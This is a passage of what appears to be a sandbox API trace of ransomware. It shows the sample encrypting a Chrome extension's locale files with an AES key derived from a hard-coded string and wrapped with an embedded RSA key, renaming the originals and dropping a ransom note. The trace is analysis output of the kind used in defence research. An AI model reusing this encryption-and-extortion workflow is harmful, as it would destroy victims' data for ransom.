CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.799] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.799] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.799] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.799] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.799] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.799] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.799] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.799] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.800] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.800] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.800] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.800] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.800] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.800] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.800] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.800] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.800] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.800] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.800] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.800] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.800] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.800] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.801] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x14b, lpOverlapped=0x0) returned 1 [0262.801] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x14b, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x150) returned 1 [0262.801] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x150, lpOverlapped=0x0) returned 1 [0262.801] CloseHandle (hObject=0x5d60) returned 1 [0262.801] CloseHandle (hObject=0x5d5c) returned 1 [0262.801] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json"), bFailIfExists=0) returned 1 [0262.804] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json", dwFileAttributes=0x0) returned 1 [0262.805] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json.gsg")) returned 1 [0262.806] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json.fuck")) returned 1 [0262.807] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0262.807] CryptDestroyKey (hKey=0x2e7da00) returned 1 [0262.807] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0262.807] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0262.807] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0262.808] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\readme_back_files.htm")) returned 0xffffffff [0262.808] AreFileApisANSI () returned 1 [0262.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275c330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 162 [0262.808] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0262.809] GetFileType (hFile=0x5d64) returned 0x1 [0262.809] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0262.810] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0262.810] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fd40 [0262.811] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0262.811] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0262.811] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0262.811] GetLastError () returned 0x0 [0262.811] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json")) returned 0x20 [0262.812] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json", dwFileAttributes=0x80) returned 1 [0262.812] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0262.813] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0262.814] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0262.814] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7a500) returned 1 [0262.817] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0262.817] lstrlenA (lpString="nyVZwrEPeJcSGZnLzNUpNIeDzMlQm") returned 29 [0262.817] CryptHashData (hHash=0x2e7fc40, pbData=0x28cb2d8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0262.817] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fc40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7da00) returned 1 [0262.817] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0262.817] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0262.817] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e73928) returned 1 [0262.817] CryptImportPublicKeyInfo (in: hCryptProv=0x2e73928, dwCertEncodingType=0x1, pInfo=0x2eacf40*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eacf70*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eacf78*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7e540) returned 1 [0262.817] CryptEncrypt (in: hKey=0x2e7e540, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0262.818] CryptEncrypt (in: hKey=0x2e7e540, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e73818*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e73818*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0262.818] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e73818*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e73818*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0262.819] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.821] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.821] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.834] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.834] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.834] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.834] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.835] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.835] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.835] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.835] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.835] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.835] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.835] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.835] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.835] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.835] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.835] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.835] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.835] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.836] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.836] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.836] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.836] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.836] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.836] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.836] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.836] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.836] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.836] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.836] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.836] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.836] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.836] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, 